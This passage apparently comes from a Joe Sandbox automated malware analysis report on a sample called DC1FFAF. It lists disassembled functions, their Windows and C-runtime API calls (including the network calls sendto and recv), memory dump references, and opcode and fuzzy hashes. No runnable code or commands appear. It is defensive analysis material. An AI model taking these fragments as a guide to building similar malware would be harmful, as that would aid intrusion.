                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2714421763-0
                                                                                                                                      • Opcode ID: fe14e1fc568c3cbdaf1f30a2efffed583d5b1b7124ed632bab4c4928e4c86193
                                                                                                                                      • Instruction ID: aa4b9e878b77cad7a7f54822e352b442cea7fddcae518b7b1acf13fcefd367bb
                                                                                                                                      • Opcode Fuzzy Hash: fe14e1fc568c3cbdaf1f30a2efffed583d5b1b7124ed632bab4c4928e4c86193
                                                                                                                                      • Instruction Fuzzy Hash: 1201A2B5D0A301EEEF15AB70AA05B5E3F64AF0236AF70900DE1B0A62C0CB3485418E97
                                                                                                                                      Function 00498AE4 Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 00498AE9
                                                                                                                                        • Part of subcall function 0049FBA3: TlsGetValue.KERNEL32(?,0049C43F), ref: 0049FBAC
                                                                                                                                        • Part of subcall function 0049FBA3: TlsSetValue.KERNEL32(00000000,0049C43F), ref: 0049FBCD
                                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 00498AF4
                                                                                                                                        • Part of subcall function 0049FB83: TlsGetValue.KERNEL32(?,?,0049C44A,00000000), ref: 0049FB91
                                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 00498B06
                                                                                                                                      • __freefls@4.LIBCMT ref: 00498B32
                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00498B45
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Value$CurrentImageNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1213517137-0
                                                                                                                                      • Opcode ID: 63c756e12f1c72e58b9f63623917a649c54475ce861053e1bcc48fe5d2a2db84
                                                                                                                                      • Instruction ID: 578a6f6e12e5861b385bae9c5f010764fa832f8fa72c4bac511117186707118a
                                                                                                                                      • Opcode Fuzzy Hash: 63c756e12f1c72e58b9f63623917a649c54475ce861053e1bcc48fe5d2a2db84
                                                                                                                                      • Instruction Fuzzy Hash: D2F081741002005ADF08BF66C955D4E3F996F5531CB18443EB40887227DF39E84AD598
                                                                                                                                      Function 69EBEE36 Relevance: 7.5, APIs: 5, Instructions: 23threadCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 69EBEE45
                                                                                                                                        • Part of subcall function 69EC8BB0: __FindPESection.LIBCMT ref: 69EC8C0B
                                                                                                                                      • __getptd_noexit.LIBCMT ref: 69EBEE55
                                                                                                                                      • CloseHandle.KERNEL32(?,?,69EBEEA0), ref: 69EBEE69
                                                                                                                                      • __freeptd.LIBCMT ref: 69EBEE70
                                                                                                                                      • ExitThread.KERNEL32 ref: 69EBEE78
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3798957060-0
                                                                                                                                      • Opcode ID: 6a5a5a57251b6529c54620ed74b2a3ba8c6438abbdb6c588996af0b6dea334bf
                                                                                                                                      • Instruction ID: 900b3415c84a28d53fd5205bbca4d86343dc3f2d81683b9ed27281d15d7323fc
                                                                                                                                      • Opcode Fuzzy Hash: 6a5a5a57251b6529c54620ed74b2a3ba8c6438abbdb6c588996af0b6dea334bf
                                                                                                                                      • Instruction Fuzzy Hash: BEE04F75901D51E7DF1256749A0873E339C7F02A69F31D24DE535D9294EB30C8098AA1
                                                                                                                                      Function 00446160 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 191COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$_strlen
                                                                                                                                      • String ID: vc8
                                                                                                                                      • API String ID: 1975251954-3387903242
                                                                                                                                      • Opcode ID: 601ae9b38d831b0f16e66721716de211d363160d906bb5628592d843ca01677b
                                                                                                                                      • Instruction ID: db76c3c1dd2ab9f70174c640f49a9d4d90168ac1576a43074361f6a946752809
                                                                                                                                      • Opcode Fuzzy Hash: 601ae9b38d831b0f16e66721716de211d363160d906bb5628592d843ca01677b
                                                                                                                                      • Instruction Fuzzy Hash: E9813AB1D002289BDB24EB65DD55BEEB7B4BF44308F4041DEE20967282DB751B88CF99
                                                                                                                                      Function 00460E30 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 00460E50
                                                                                                                                        • Part of subcall function 0045E2A0: _memset.LIBCMT ref: 0045E2B5
                                                                                                                                        • Part of subcall function 0045E2A0: _malloc.LIBCMT ref: 0045E2D2
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$_malloc
                                                                                                                                      • String ID: 0F$0F
                                                                                                                                      • API String ID: 3506388080-1163785274
                                                                                                                                      • Opcode ID: ae1cfd32b06a128c34217a80d459d007349c764e53978bbd747be930873fc10c
                                                                                                                                      • Instruction ID: 1e54fc142fc732bc74c1de2c220937b9f5784b952171f856c6b23141cc690035
                                                                                                                                      • Opcode Fuzzy Hash: ae1cfd32b06a128c34217a80d459d007349c764e53978bbd747be930873fc10c
                                                                                                                                      • Instruction Fuzzy Hash: D4715AB1D00209ABCF24DFA8CC40BDFB7B9AF44318F148299E519A3391E7349A84CF56
                                                                                                                                      Function 00470DCB Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetParent.USER32(?), ref: 00470DFA
                                                                                                                                      • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 00470E1D
                                                                                                                                        • Part of subcall function 0046E804: MonitorFromWindow.USER32(?,?), ref: 0046E81B
                                                                                                                                        • Part of subcall function 0046E871: GetMonitorInfoA.USER32(?,?), ref: 0046E888
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Monitor$FromInfoMessageParentSendWindow
                                                                                                                                      • String ID: (
                                                                                                                                      • API String ID: 3120657332-3887548279
                                                                                                                                      • Opcode ID: e2faf35d48e9762d0897f9aa0e1d8f6c6a1cb1ed07b48bd779acccd072a89941
                                                                                                                                      • Instruction ID: eeca3e39d22659c2ad5f42011a226bb05ba6b4941e77cb822c63eb52c2e11c62
                                                                                                                                      • Opcode Fuzzy Hash: e2faf35d48e9762d0897f9aa0e1d8f6c6a1cb1ed07b48bd779acccd072a89941
                                                                                                                                      • Instruction Fuzzy Hash: 95518072900219ABDB10DBB9CD85EEFBBB9AF48314F15451AF509F3250DB38E9018764
                                                                                                                                      Function 00449FB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 138networkCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$recv
                                                                                                                                      • String ID: @
                                                                                                                                      • API String ID: 329764729-2766056989
                                                                                                                                      • Opcode ID: 87830ac0dafc31dbf1873203dd0811af9bdfc153cd99f4bfa6774670546c1c75
                                                                                                                                      • Instruction ID: 65b45b81c08f6e0296a171cfa3aaa6a3d3984d23d762324bcb66ff405946650f
                                                                                                                                      • Opcode Fuzzy Hash: 87830ac0dafc31dbf1873203dd0811af9bdfc153cd99f4bfa6774670546c1c75
                                                                                                                                      • Instruction Fuzzy Hash: 40515A70A44258DBEF20CF54CC84BEEB7B5AB46308F2440DAD409A7681C77A9F95CF0A
                                                                                                                                      Function 0046DA20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 0046DAB4
                                                                                                                                      • sendto.WS2_32(00000001,?,00000001,0000002C,00000000,?,00000010,00000001,0000002C), ref: 0046DB60
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memsetsendto
                                                                                                                                      • String ID: ,
                                                                                                                                      • API String ID: 100040136-3772416878
                                                                                                                                      • Opcode ID: b6336d5dfdcefde0e217e7c2b923c7ec2b5eced0d4b5814d0c4657ca62f7f3ae
                                                                                                                                      • Instruction ID: 46338a009a56e7666f000100e7c65d7f6fc2f08dc1befcb876f0a015fb3a271e
                                                                                                                                      • Opcode Fuzzy Hash: b6336d5dfdcefde0e217e7c2b923c7ec2b5eced0d4b5814d0c4657ca62f7f3ae
                                                                                                                                      • Instruction Fuzzy Hash: 62517974E002188BDB24DF24CC41BEAB3B1FF49304F1085D9E949AB391E675AE81CF96
                                                                                                                                      Function 0044E780 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 0044E7A1
                                                                                                                                        • Part of subcall function 004983AD: __FF_MSGBANNER.LIBCMT ref: 004983D0
                                                                                                                                        • Part of subcall function 004983AD: __NMSG_WRITE.LIBCMT ref: 004983D7
                                                                                                                                        • Part of subcall function 004983AD: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,004A296A,?,00000001,?,?,004A1322,00000018,00516498,0000000C,004A13B3), ref: 00498424
                                                                                                                                      • _memset.LIBCMT ref: 0044E7C7
                                                                                                                                      • _rand.LIBCMT ref: 0044E7E9
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap_malloc_memset_rand
                                                                                                                                      • String ID: n
                                                                                                                                      • API String ID: 1602865748-2013832146
                                                                                                                                      • Opcode ID: 199602f55602a8890ae52f0d83eb99ac3163531fc0be96f23062067d9a2f73e7
                                                                                                                                      • Instruction ID: 4b866a8db5832ab9041274566c94e7c2cddb57e6da9af29ebe865b277d6b4397
                                                                                                                                      • Opcode Fuzzy Hash: 199602f55602a8890ae52f0d83eb99ac3163531fc0be96f23062067d9a2f73e7
                                                                                                                                      • Instruction Fuzzy Hash: 8801D8B1E442087BEF14ABA5EC46FADBB75AB60714F00417EF5087B2C0D67D5404876A
                                                                                                                                      Function 69E88B30 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E88B52
                                                                                                                                      • OutputDebugStringA.KERNEL32(?,00000000,?,69E89039,?), ref: 69E88B7C
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E88B83
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugOutputString$__wfopen_s
                                                                                                                                      • String ID: C:\123.txt
                                                                                                                                      • API String ID: 4089825709-757984348
                                                                                                                                      • Opcode ID: f7f46419605921afa67ca9a30af98810debd1dfbf4751eb59f38c3c589588108
                                                                                                                                      • Instruction ID: cf1b7522edbd66eb672c2d0eaedc60d6eed01961e50da8670854932657974d7c
                                                                                                                                      • Opcode Fuzzy Hash: f7f46419605921afa67ca9a30af98810debd1dfbf4751eb59f38c3c589588108
                                                                                                                                      • Instruction Fuzzy Hash: ECE0D8BE824115AAC700E6E49E00E6F779C5BC9350F249C1EF44982100E678D505D792
                                                                                                                                      Function 69E88B3E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E88B52
                                                                                                                                      • OutputDebugStringA.KERNEL32(?,00000000,?,69E89039,?), ref: 69E88B7C
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E88B83
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugOutputString$__wfopen_s
                                                                                                                                      • String ID: C:\123.txt
                                                                                                                                      • API String ID: 4089825709-757984348
                                                                                                                                      • Opcode ID: 71ebaa2795e9e21d2ffdecda634fe0d0da88ad86ed2c5ca16e9bf2d923c9dce3
                                                                                                                                      • Instruction ID: 16ef52c26666272842d9b63f336dbd0b8809f76dc3ded17b6d532b3af41b2fd0
                                                                                                                                      • Opcode Fuzzy Hash: 71ebaa2795e9e21d2ffdecda634fe0d0da88ad86ed2c5ca16e9bf2d923c9dce3
                                                                                                                                      • Instruction Fuzzy Hash: F9E0DFBE824214AAC700E6B49D00AAFB7989BC9314F609C2EF44982100E678D805EB82
                                                                                                                                      Function 00445DD0 Relevance: 6.1, APIs: 4, Instructions: 139COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 00445DE8
                                                                                                                                        • Part of subcall function 004983AD: __FF_MSGBANNER.LIBCMT ref: 004983D0
                                                                                                                                        • Part of subcall function 004983AD: __NMSG_WRITE.LIBCMT ref: 004983D7
                                                                                                                                        • Part of subcall function 004983AD: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,004A296A,?,00000001,?,?,004A1322,00000018,00516498,0000000C,004A13B3), ref: 00498424
                                                                                                                                      • _memset.LIBCMT ref: 00445E11
                                                                                                                                      • _malloc.LIBCMT ref: 00445E20
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _malloc$AllocateHeap_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3655941445-0
                                                                                                                                      • Opcode ID: 2a79432312a6a92d174cc71af8ed83ac8a37a6bdcc1c81c7a4177c2ef59b4f05
                                                                                                                                      • Instruction ID: 279c79e567be0d9e9e863be1344ce4ca0daa85eaa6d49aaa3a6a06ebff117255
                                                                                                                                      • Opcode Fuzzy Hash: 2a79432312a6a92d174cc71af8ed83ac8a37a6bdcc1c81c7a4177c2ef59b4f05
                                                                                                                                      • Instruction Fuzzy Hash: A95153B1E00509EBEF04DF94C885FEEBBB5EB50304F208569E5056B381D779AA85CB45
                                                                                                                                      Function 69EC098A Relevance: 6.1, APIs: 4, Instructions: 137COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __flush.LIBCMT ref: 69EC0A4E
                                                                                                                                      • __fileno.LIBCMT ref: 69EC0A6E
                                                                                                                                      • __locking.LIBCMT ref: 69EC0A75
                                                                                                                                      • __flsbuf.LIBCMT ref: 69EC0AA0
                                                                                                                                        • Part of subcall function 69EC2DCA: __getptd_noexit.LIBCMT ref: 69EC2DCA
                                                                                                                                        • Part of subcall function 69EC24F4: __decode_pointer.LIBCMT ref: 69EC24FF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3240763771-0
                                                                                                                                      • Opcode ID: be266a28c1a82b72dca359b1001788120794cb598de9e9e0b15c04949eb3edde
                                                                                                                                      • Instruction ID: 0c0be932d1bbc5b66c70137c0e2bab7cc450880e8954c614dc86e9778247085c
                                                                                                                                      • Opcode Fuzzy Hash: be266a28c1a82b72dca359b1001788120794cb598de9e9e0b15c04949eb3edde
                                                                                                                                      • Instruction Fuzzy Hash: FB4182B1A00B04DBDF04CFA98A8469EB7B5FF81765F34852DD4B596240D770DA518B42
                                                                                                                                      Function 00498CF1 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __fileno__flsbuf__flush__locking
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2259706978-0
                                                                                                                                      • Opcode ID: 5ffa1dadc69c3321309cdbb227dcfdc3d4a5c6ee654dce84e9889ae1b8c3eccc
                                                                                                                                      • Instruction ID: c72df684372121ece5ecce346c696a8ac86eb46fce62ed1a946ec4eaffdd58bb
                                                                                                                                      • Opcode Fuzzy Hash: 5ffa1dadc69c3321309cdbb227dcfdc3d4a5c6ee654dce84e9889ae1b8c3eccc
                                                                                                                                      • Instruction Fuzzy Hash: DA419631A00608EBDF249F6D889455FBFB5EF92364F24863FE45597280DB78DD418B48
                                                                                                                                      Function 00433410 Relevance: 6.1, APIs: 4, Instructions: 112windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: IconNotifyShell__memset_strlen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1932066056-0
                                                                                                                                      • Opcode ID: aa6a1ddb82ca637306bc404f83ca0ee19fd8221a5921107c70f1618cf28ee2ad
                                                                                                                                      • Instruction ID: 5cf724661985dcbe4681135765c1435867ea3ef27dcd874fa1e0f2ad49d94e21
                                                                                                                                      • Opcode Fuzzy Hash: aa6a1ddb82ca637306bc404f83ca0ee19fd8221a5921107c70f1618cf28ee2ad
                                                                                                                                      • Instruction Fuzzy Hash: B5511974900218DFDB24DF25C845BDAB7B5BB58308F5081EAE40D9B382DB79AE89CF54
                                                                                                                                      Function 0049C4B7 Relevance: 6.1, APIs: 4, Instructions: 73threadCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
